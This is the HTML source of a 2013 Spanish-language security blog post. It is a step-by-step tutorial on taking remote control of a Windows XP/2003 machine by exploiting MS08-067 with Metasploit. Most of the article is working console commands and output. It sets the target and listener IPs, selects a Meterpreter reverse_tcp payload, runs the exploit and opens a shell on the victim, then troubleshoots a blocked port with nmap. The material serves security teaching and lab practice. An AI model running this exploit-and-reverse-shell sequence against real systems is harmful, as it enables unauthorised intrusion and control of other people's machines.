Вы находитесь на странице: 1из 10

<!

DOCTYPE html>
<!--[if IE 6]>
<html id="ie6" lang="en-US">
<![endif]-->
<!--[if IE 7]>
<html id="ie7" lang="en-US">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!-->
<html lang="en-US"><!--<![endif]--><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<title>Tomar control remoto de una mquina Windows XP / 2003 con Metasploit | Redi
nSkala</title>
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="stylesheet" type="text/css" media="all" href="Tomar%20control%20remot
o%20de%20una%20m%C3%A1quina%20Windows%20XP%20_%202003%20con%20Metasploit%20%7C%2
0RedinSkala_files/style.css">
<link rel="pingback" href="http://www.redinskala.com/xmlrpc.php">
<!--[if lt IE 9]>
<script src="http://www.redinskala.com/wp-content/themes/twentyeleven/js/html5.j
s" type="text/javascript"></script>
<![endif]-->
<link rel="alternate" type="application/rss+xml" title="RedinSkala Feed" href="h
ttp://www.redinskala.com/feed/">
<link rel="alternate" type="application/rss+xml" title="RedinSkala Comments Feed
" href="http://www.redinskala.com/comments/feed/">
<link rel="alternate" type="application/rss+xml" title="RedinSkala Tomar control
remoto de una mquina Windows XP / 2003 con Metasploit Comments Feed" href="http:
//www.redinskala.com/2013/04/08/tomar-control-remoto-de-una-maquina-windows-xp-2
003-con-metasploit/feed/">
<link rel="stylesheet" id="dark-css" href="Tomar%20control%20remoto%20de%20una%2
0m%C3%A1quina%20Windows%20XP%20_%202003%20con%20Metasploit%20%7C%20RedinSkala_fi
les/dark.css" type="text/css" media="all">
<script type="text/javascript" src="Tomar%20control%20remoto%20de%20una%20m%C3%A
1quina%20Windows%20XP%20_%202003%20con%20Metasploit%20%7C%20RedinSkala_files/com
ment-reply.js"></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.redi
nskala.com/xmlrpc.php?rsd">
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.redi
nskala.com/wp-includes/wlwmanifest.xml">
<link rel="prev" title="IMSVA retraso en la entrega de correo (cleanup muy alto)
" href="http://www.redinskala.com/2013/03/26/imsva-retraso-en-la-entrega-de-corr
eo-cleanup-muy-alto/">
<link rel="next" title="Instalacin de Solaris 10 en VMWare Workstation" href="htt
p://www.redinskala.com/2013/04/11/instalacion-de-solaris-10-en-vmware-workstatio
n/">
<meta name="generator" content="WordPress 3.5">
<link rel="canonical" href="http://www.redinskala.com/2013/04/08/tomar-control-r
emoto-de-una-maquina-windows-xp-2003-con-metasploit/">
<link rel="shortlink" href="http://www.redinskala.com/?p=382">
<style>
/* Link color */
a,
#site-title a:focus,
#site-title a:hover,
#site-title a:active,

.entry-title a:hover,
.entry-title a:focus,
.entry-title a:active,
.widget_twentyeleven_ephemera .comments-link a:hover,
section.recent-posts .other-recent-posts a[rel="bookmark"]:hover
,
section.recent-posts .other-recent-posts .comments-link a:hover,
.format-image footer.entry-meta a:hover,
#site-generator a:hover {
color: #2870a7;
}
section.recent-posts .other-recent-posts .comments-link a:hover
{
border-color: #2870a7;
}
article.feature-image.small .entry-summary p a:hover,
.entry-header .comments-link a:hover,
.entry-header .comments-link a:focus,
.entry-header .comments-link a:active,
.feature-slider a.active {
background-color: #2870a7;
}
</style>
<style type="text/css">
#site-title,
#site-description {
position: absolute !important;
clip: rect(1px 1px 1px 1px); /* IE6, IE7 */
clip: rect(1px, 1px, 1px, 1px);
}
</style>
<style type="text/css" id="custom-background-css">
body.custom-background { background-color: #3e3e3e; }
</style>
</head>
<body class="single single-post postid-382 single-format-standard custom-backgro
und two-column left-sidebar">
<div id="page" class="hfeed">
<header id="branding" role="banner">
<hgroup>
<h1 id="site-title"><span><a href="http://www.re
dinskala.com/" title="RedinSkala" rel="home">RedinSkala</a></span></h1>
<h2 id="site-description">Porque todo tiene una
respuesta</h2>
</hgroup>
<a href="http://www.redinskala.c
om/">
<img src
="Tomar%20control%20remoto%20de%20una%20m%C3%A1quina%20Windows%20XP%20_%202003%2
0con%20Metasploit%20%7C%20RedinSkala_files/RS12.jpg" alt="" height="288" width="
1000">
</a>
<nav id="access" role="navigation">
<h3 class="assistive-text">Main menu</h3>
<div class="skip
-link"><a class="assistive-text" href="#content" title="Skip to primary content"

>Skip to primary content</a></div>


<div class="skip-link"><a class="assistive-text"
href="#secondary" title="Skip to secondary content">Skip to secondary content</
a></div>
<div class="menu
-menu-horizontal-container"><ul id="menu-menu-horizontal" class="menu"><li id="m
enu-item-39" class="menu-item menu-item-type-custom menu-item-object-custom menu
-item-home menu-item-39"><a title="Inicio" href="http://www.redinskala.com/">Ini
cio</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-post_type menu-item-object
-page menu-item-77"><a href="http://www.redinskala.com/libros/">Libros</a>
<ul class="sub-menu">
<li id="menu-item-78" class="menu-item menu-item-type-post_type menu-ite
m-object-page menu-item-78"><a href="http://www.redinskala.com/libros/fundamento
s-de-correo-electronico/">Fundamentos de Correo Electrnico</a></li>
<li id="menu-item-124" class="menu-item menu-item-type-post_type menu-it
em-object-page menu-item-124"><a href="http://www.redinskala.com/libros/fundamen
tos-e-implementacion-del-protocolo-dkim/">Fundamentos e implementacin del protoco
lo DKIM</a></li>
<li id="menu-item-180" class="menu-item menu-item-type-post_type menu-it
em-object-page menu-item-180"><a href="http://www.redinskala.com/libros/fundamen
tos-e-implementacion-del-protocolo-spf-y-sender-id/">Fundamentos e Implementacin
de los protocolos SPF y Sender-ID</a></li>
<li id="menu-item-268" class="menu-item menu-item-type-post_type menu-it
em-object-page menu-item-268"><a href="http://www.redinskala.com/libros/fundamen
tos-del-protocolo-tls/">Fundamentos del Protocolo TLS</a></li>
<li id="menu-item-533" class="menu-item menu-item-type-post_type menu-it
em-object-page menu-item-533"><a href="http://www.redinskala.com/libros/manual-a
vanzado-de-implementacion-y-configuracion-de-imsva/">Manual Avanzado de Implemen
tacin y Configuracin de IMSVA</a></li>
</ul>
</li>
<li id="menu-item-38" class="menu-item menu-item-type-post_type menu-item-object
-page menu-item-38"><a href="http://www.redinskala.com/contacto/">Contacto</a></
li>
<li id="menu-item-37" class="menu-item menu-item-type-post_type menu-item-object
-page menu-item-37"><a href="http://www.redinskala.com/about/">About</a></li>
</ul></div>
</nav><!-- #access -->
</header><!-- #branding -->
<div id="main">
<div id="primary">
<div id="content" role="main">
<nav id="nav-single">
<h3 class="assistive-text">Post
navigation</h3>
<span class="nav-previous"><a hr
ef="http://www.redinskala.com/2013/03/26/imsva-retraso-en-la-entrega-de-correo-c
leanup-muy-alto/" rel="prev"><span class="meta-nav"></span> Previous</a></span>
<span class="nav-next"><a href="
http://www.redinskala.com/2013/04/11/instalacion-de-solaris-10-en-vmware-worksta
tion/" rel="next">Next <span class="meta-nav"></span></a></span>
</nav><!-- #nav-single -->
<article id="post-382" class="post-382 post type-post status-publish format-stan

dard hentry category-metasploit tag-backdoor tag-exploit tag-metasploit-2 tag-vu


lnerability">
<header class="entry-header">
<h1 class="entry-title">Tomar control remoto de una mquina Window
s XP / 2003 con Metasploit</h1>
<div class="entry-meta">
<span class="sep">Posted on </span><a href="http://www.r
edinskala.com/2013/04/08/tomar-control-remoto-de-una-maquina-windows-xp-2003-con
-metasploit/" title="7:25 pm" rel="bookmark"><time class="entry-date" datetime="
2013-04-08T19:25:18+00:00">April 8, 2013</time></a><span class="by-author"> <spa
n class="sep"> by </span> <span class="author vcard"><a class="url fn n" href="h
ttp://www.redinskala.com/author/rskala/" title="View all posts by rskala" rel="a
uthor">rskala</a></span></span>
</div><!-- .entry-meta -->
</header><!-- .entry-header -->
<div class="entry-content">
<p><a href="http://en.redinskala.com/take-remote-control-over-awindows-xp-2003-machine-with-metasploit/">[Read this post in English]</a></p>
<p>Existen diversos posts y videos que muestran&nbsp; este
procedimiento, sin embargo, hemos recibidos varias preguntas al respecto
por lo que aqu les presentamos cmo utilizar su Metasploit para tomar
control remoto de una mquina windows 2003 XP. <span id="more-382"></span></p>
<p>En este post mostraremos como aprovechar la vulnerabilidad MS08-067
del mdulo netapi utilizado en el protocolo SMB de equipos Windows que
permite la ejecucin de cdigo arbitrario. Para esto usaremos dos
mquinas, una con Metasploit (puede ser windows linux) y una mquina
XP (tambin puede ser una Windows 2003).</p>
<p>Para comenzar abrimos la consola de Metasploit con el comando:</p>
<pre># msfconsole</pre>
<p>Ahora seleccionamos el exploit para nuestra vulnerabilidad con el siguiente c
omando:</p>
<pre>msf &gt; use exploit/windows/smb/ms08_067_netapi
msf&nbsp; exploit(ms08_067_netapi) &gt;</pre>
<p>Ya que tenemos en el prompt el nombre de la vulnerabilidad ejecutamos el sigu
iente comando para ver cmo debemos configurarlo:</p>
<pre>msf&nbsp; exploit(ms08_067_netapi) &gt; <b>show options
</b>Module options (exploit/windows/smb/ms08_067_netapi):
Name &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Current Setting &nbsp;&nbsp;Required&nbsp; De
scription
----&nbsp;&nbsp;&nbsp;&nbsp; ---------------&nbsp; &nbsp;--------&nbsp;&nbsp; ---------RHOST&nbsp;&nbsp;&nbsp;&nbsp;
yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp; The target address
RPORT&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;445&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Se
t the SMB service port
SMBPIPE&nbsp; &nbsp;&nbsp;&nbsp;BROWSER&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The pipe name to use (BROWSER, S
RVSVC)
Exploit target:
Id&nbsp; Name
--&nbsp; ---0&nbsp;&nbsp; Automatic Targeting</pre>
<p>La primera opcin RHOST debe contener el nombre direccin IP de la
mquina XP que queremos atacar. RPORT y SMBPIPE son opciones
obligatorias que indican el puerto por el que se mandar el exploit y el
tipo de conexin a utilizar. No es necesario modificar estos ltimos

dos valores.</p>
<p>Para configurar la IP de la mquina XP que vamos a atacar, ejecutamos el siguie
nte comando:</p>
<pre>msf&nbsp; exploit(ms08_067_netapi) &gt; set RHOST 192.168.75.90
RHOST =&gt; 192.168.75.90</pre>
<p><em>&nbsp;Donde 192.168.75.90 corresponde a la IP de la vctima</em></p>
<p>La seccin Exploit target indica a qu plataformas se mandar este
exploit. Si ejecutamos el siguiente comando podemos ver todas las
plataformas que son vulnerables con este exploit:</p>
<pre>msf&nbsp; exploit(ms08_067_netapi) &gt; show targets
Exploit targets:
Id&nbsp; Name
--&nbsp; ---0&nbsp;&nbsp; Automatic Targeting
1&nbsp;&nbsp; Windows 2000 Universal
2&nbsp;&nbsp; Windows XP SP0/SP1 Universal
3&nbsp;&nbsp; Windows XP SP2 English (AlwaysOn NX)</pre>
<p>Observamos que la opcin actual 0 indica una identificacin
automtica de la plataforma, esta opcin es suficiente y no es necesario
modificarla. Si se desea cambiar podemos hacerlo con el siguiente
comando:</p>
<pre>msf&nbsp; exploit(ms08_067_netapi) &gt; set target 1
target =&gt; 1</pre>
<p>Por ltimo debemos configurar el payload de nuestro exploit, esto no
es ms que indicarle a Mestasploit que una vez que la vulnerabilidad sea
explotada en el equipo vctima, debe ejecutar cierta aplicacin para
que podamos tomar control remoto de la mquina. Esta configuracin la
agregamos con la siguiente opcin:</p>
<pre>msf&nbsp; exploit(ms08_067_netapi) &gt; set payload windows/meterpreter/rev
erse_tcp
payload =&gt; windows/meterpreter/reverse_tcp</pre>
<p>El payload reverse_tcp ejecuta un cliente reverso en la mquina XP,
dicho cliente se conectar hacia nuestro Metasploit por el puerto por
defecto 4444. Este payload es el que finalmente nos permitir tomar
control del equipo vctima. Ahora para indicarle a este cliente que se
conecte a nuestro Metasploit, debemos ejecutar el siguiente comando:</p>
<pre>msf&nbsp; exploit(ms08_067_netapi) &gt; set LHOST 192.168.75.35
LHOST =&gt; 192.168.75.35</pre>
<p><em>Donde 192.168.75.35 corresponde a la IP de la mquina donde estamos ejecuta
ndo el Metasploit</em></p>
<p>Con esta configuracin estamos listos para inciar el ataque a la
vctima XP. Si ejecutamos una ltima vez el comando show options
veremos cmo qued la configuracin de nuestro exploit:</p>
<pre>msf&nbsp; exploit(ms08_067_netapi) &gt; show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name&nbsp;&nbsp;&nbsp;&nbsp; Current Setting&nbsp; Required&nbsp; Description
----&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;--------------&nbsp; --------&nbsp; ----------RHOST&nbsp;&nbsp;&nbsp; 192.168.75.90&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp; The target address
RPORT&nbsp;&nbsp;&nbsp; 445&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
;&nbsp;&nbsp; &nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Set the SMB service
port
SMBPIPE&nbsp; BROWSER&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; yes&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Current Setting&nbsp; Required&nbsp; Descript
ion
----&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ---------------&nbsp; --------&nbsp; --------

--EXITFUNC&nbsp; thread&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbs


p;yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Exit technique: seh, thread, process,
none
LHOST&nbsp;&nbsp;&nbsp; &nbsp;192.168.75.35&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nb
sp;&nbsp;&nbsp;&nbsp; The listen address
LPORT&nbsp;&nbsp; &nbsp; 4444&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;&nbsp; &nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The listen port
Exploit target:
Id&nbsp; Name
--&nbsp; ---0&nbsp;&nbsp; Automatic Targeting</pre>
<p>Ahora estamos listos para enviar el ataque, para esto slo ejecutamos
el comando exploit y esperamos a que se concrete la operacin:</p>
<pre>msf&nbsp; exploit(ms08_067_netapi) &gt; exploit
[*] Started reverse handler on 192.168.75.35:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.75.90
[*] Meterpreter session 1 opened (192.168.75.35:4444 -&gt;
192.168.75.90:1049) at 2013-04-08 18:53:58 -0500
meterpreter &gt;</pre>
<p>El ltimo prompt meterpreter&gt; nos indica que estamos listos para
controlar la mquina XP, para comprobar que ya nos encontramos dentro
de la mquina XP, ejecutamos el comando sysinfo:</p>
<pre>meterpreter &gt; sysinfo
Computer&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : TMWINXP01
OS&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
: Windows XP (Build 2600, Service Pack 2).
Architecture&nbsp;&nbsp;&nbsp; : x86
System Language : es_MX
Meterpreter&nbsp;&nbsp;&nbsp;&nbsp; : x86/win32</pre>
<p>Ahora bien, podemos ejecutar el comando shell para tener un prompt
dentro del equipo vctima y comenzar a ejecutar operaciones:</p>
<pre>meterpreter &gt; shell
Process 1652 created.
Channel 1 created.
Microsoft Windows XP [Versin 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32&gt;</pre>
<p>Y listo! Ya estamos controlando la mquina vctima XP. Ahora bien,
puede ser que al ejecutar el comando exploit la respuesta sea como se
muestra a continuacin, en este caso significa que el puerto est
cerrado y no podremos tomar control de esta mquina.</p>
<pre>&nbsp;msf&nbsp; exploit(ms08_067_netapi) &gt; exploit
[*] Started reverse handler on 192.168.75.35:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout
The connection timed out (192.168.75.90:445).</pre>
<p>La razn ms probable es que hay un firewall un IPS en medio que
est bloqueando nuestra conexin o que la mquina XP tenga el firewall
activo, en este caso se deber utilizar otro tipo de exploit para tomar
control. Para comprobar que el puerto est cerrado podemos ejecutar el
siguiente comando desde Metasploit:</p>
<pre>msf&nbsp; exploit(ms08_067_netapi) &gt; nmap 192.168.75.90
[*] exec: nmap 192.168.75.90
Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-08 19:18 CDT
Nmap scan report for 192.168.75.90

Host is up (0.00019s latency).


All 1000 scanned ports on 192.168.75.90 are filtered
MAC Address: 00:0C:29:4E:E1:93 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 34.51 seconds</pre>
<p>Este resultado nos confirma que la mquina vctima est detrs de un
Firewall o tiene el Firewall de Windows activo y est bloqueando todas
nuestras conexiones. En este caso podemos utilizar alguna otra
vulnerabilidad como backdoors o vulnerabilidades de java para poder
tomar control remoto de la mquina. Puedes revisar nuestro post <a title="Creacin d
e un backdoor ejecutable con Metasploit" href="http://www.redinskala.com/2013/02
/28/creacion-de-un-backdoor-ejecutable-con-metasploit/">Creacin de un backdoor co
n Metasploit</a> nuestra seccin de <a href="http://www.redinskala.com/tag/metaspl
oit">Metasploit </a>para mayor informacin.</p>
<p>&nbsp;</p>
<p>Recuerda que puedes mandarnos tus preguntas y comentarios a nuestra cuenta de
Twitter: <a href="http://twitter.com/redinskala">@redinskala</a> donde encontra
rs ms informacin y tips de seguridad.</p>
<p>Gracias por tu visita!</p>
<p>&nbsp;</p>
</div><!-- .entry-content -->
<footer class="entry-meta">
This entry was posted in <a href="http://www.redinskala.com/cate
gory/metasploit/" title="View all posts in Metasploit" rel="category tag">Metasp
loit</a> and tagged <a href="http://www.redinskala.com/tag/backdoor/" rel="tag">
backdoor</a>, <a href="http://www.redinskala.com/tag/exploit/" rel="tag">exploit
</a>, <a href="http://www.redinskala.com/tag/metasploit-2/" rel="tag">metasploit
</a>, <a href="http://www.redinskala.com/tag/vulnerability/" rel="tag">vulnerabi
lity</a> by <a href="http://www.redinskala.com/author/rskala/">rskala</a>. Bookm
ark the <a href="http://www.redinskala.com/2013/04/08/tomar-control-remoto-de-un
a-maquina-windows-xp-2003-con-metasploit/" title="Permalink to Tomar control rem
oto de una mquina Windows XP / 2003 con Metasploit" rel="bookmark">permalink</a>.
</footer><!-- .entry-meta -->
</article><!-- #post-382 -->
<div id="comments">
<h2 id="comments-title">
One thought on <span>Tomar control remoto de una mquina Wi
ndows XP / 2003 con Metasploit</span>
</h2>
<ol class="commentlist">
<li class="post pingback">
<p>Pingback: <a href="http://en.redinskala.com/take-remote-contr
ol-over-a-windows-xp-2003-machine-with-metasploit/" rel="external nofollow" clas
s="url">Take remote control over a windows XP / 2003 machine with Metasploit | R
edinSkala</a></p>
</li>
</ol>
<p class="nocomments">Comments are closed.</p>

</div><!-- #comments -->

</div><!-- #content -->


</div><!-- #primary -->
<div id="secondary" class="widget-area" role="complementary">
<aside id="search-2" class="widget widget_search">
<form method="get" id="searchform" action="http://www.redinskala.com/">
<label for="s" class="assistive-text">Search</label>
<input class="field" name="s" id="s" placeholder="Search" type="
text">
<input class="submit" name="submit" id="searchsubmit" value="Sea
rch" type="submit">
</form>
</aside><aside id="text-4" class="widget widget_text"><h3 class="widget-title">C
ontacto</h3>
<div class="textwidget">Sguenos en Twitter <a hre
f="http://twitter.com/redinskala">@redinskala</a></div>
</aside><aside id="pages-2" class="widget widget_pages"><h3 clas
s="widget-title">Libros</h3>
<ul>
<li class="page_item page-item-61"><a href="http://www.r
edinskala.com/libros/fundamentos-de-correo-electronico/">Fundamentos de Correo E
lectrnico</a></li>
<li class="page_item page-item-262"><a href="http://www.redinskala.com/libros/fu
ndamentos-del-protocolo-tls/">Fundamentos del Protocolo TLS</a></li>
<li class="page_item page-item-177"><a href="http://www.redinskala.com/libros/fu
ndamentos-e-implementacion-del-protocolo-spf-y-sender-id/">Fundamentos e Impleme
ntacin de los protocolos SPF y Sender-ID</a></li>
<li class="page_item page-item-120"><a href="http://www.redinskala.com/libros/fu
ndamentos-e-implementacion-del-protocolo-dkim/">Fundamentos e implementacin del p
rotocolo DKIM</a></li>
<li class="page_item page-item-530"><a href="http://www.redinskala.com/libros/ma
nual-avanzado-de-implementacion-y-configuracion-de-imsva/">Manual Avanzado de Im
plementacin y Configuracin de IMSVA</a></li>
</ul>
</aside><aside id="categories-4" class="widget widget_categories
"><h3 class="widget-title">Categoras</h3>
<ul>
<li class="cat-item cat-item-7"><a href="http://www.redinskala.com/categ
ory/fotos/" title="View all posts filed under Fotos">Fotos</a> (1)
</li>
<li class="cat-item cat-item-30"><a href="http://www.redinskala.com/cate
gory/metasploit/" title="View all posts filed under Metasploit">Metasploit</a> (
6)
</li>
<li class="cat-item cat-item-4"><a href="http://www.redinskala.com/categ
ory/seguridad-en-correo/" title="View all posts filed under Seguridad en Correo"
>Seguridad en Correo</a> (54)
</li>
<li class="cat-item cat-item-48"><a href="http://www.redinskala.com/cate
gory/sistemas-operativos/" title="View all posts filed under Sistemas Operativos
">Sistemas Operativos</a> (3)
</li>
<li class="cat-item cat-item-1"><a href="http://www.redinskala.com/categ
ory/varios/" title="View all posts filed under Varios">Varios</a> (1)
</li>
<li class="cat-item cat-item-5"><a href="http://www.redinskala.com/categ
ory/vmware/" title="View all posts filed under VMware">VMware</a> (4)
</li>
</ul>
</aside><aside id="text-3" class="widget widget_text">
<div cla
ss="textwidget"><hr></div>
</aside>
<aside id="recent-posts-3" class="widget
widget_recent_entries">
<h3 class="widget-title">Lo ms reciente</

h3>

<ul>

<li>
<a href="http://www.redinskala.com/2014/03/11/im
sva-puede-parecer-un-open-relay/" title="IMSVA puede parecer un Open-Relay">IMSV
A puede parecer un Open-Relay</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/30/in
tegracion-de-imsva-a-multiples-ldap/" title="Integracin de IMSVA a mltiples LDAP">
Integracin de IMSVA a mltiples LDAP</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/29/ha
bilitar-spf-en-imsva/" title="Habilitar y configurar SPF en IMSVA">Habilitar y c
onfigurar SPF en IMSVA</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/18/co
mo-funciona-tls/" title="Cmo funciona TLS?">Cmo funciona TLS?</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/11/co
mo-encontrar-el-ep/" title="Cmo encontrar el Entry Point (EP) en Memoria y Disco"
>Cmo encontrar el Entry Point (EP) en Memoria y Disco</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/11/el
-formato-pe-parte-ii/" title="El Formato PE (Portable Executable) Parte II">El F
ormato PE (Portable Executable) Parte II</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/11/an
alisis-421-error-timeout-exceeded/" title="Anlisis de prdida de conexin | 421 4.4.2
host Error: timeout exceeded">Anlisis de prdida de conexin | 421 4.4.2 host Error:
timeout exceeded</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/09/fo
rmato-pe-parte-i/" title="El Formato PE (Portable Executable) Parte I">El Format
o PE (Portable Executable) Parte I</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/09/26/an
alisis-de-smtp-con-wireshark/" title="Anlisis de SMTP con Wireshark">Anlisis de SM
TP con Wireshark</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/09/25/es
x-en-modo-promiscuo/" title="Configurar tarjetas de red de ESX en modo promiscuo
">Configurar tarjetas de red de ESX en modo promiscuo</a>
</li>
</ul>
</aside>
</div><!-- #secondary .widget-area -->
</div><!-- #main -->
<footer id="colophon" role="contentinfo">

<div id="site-generator">
<a href="http://
wordpress.org/" title="Semantic Personal Publishing Platform">RedinSkala. Todos
los derechos reservados. 2012</a>
</div>
</footer><!-- #colophon -->
</div><!-- #page -->
<script type="text/javascript" src="Tomar%20control%20remoto%20de%20una%20m%C3%A
1quina%20Windows%20XP%20_%202003%20con%20Metasploit%20%7C%20RedinSkala_files/dev
icepx-jetpack.js"></script>
</body></html>

Вам также может понравиться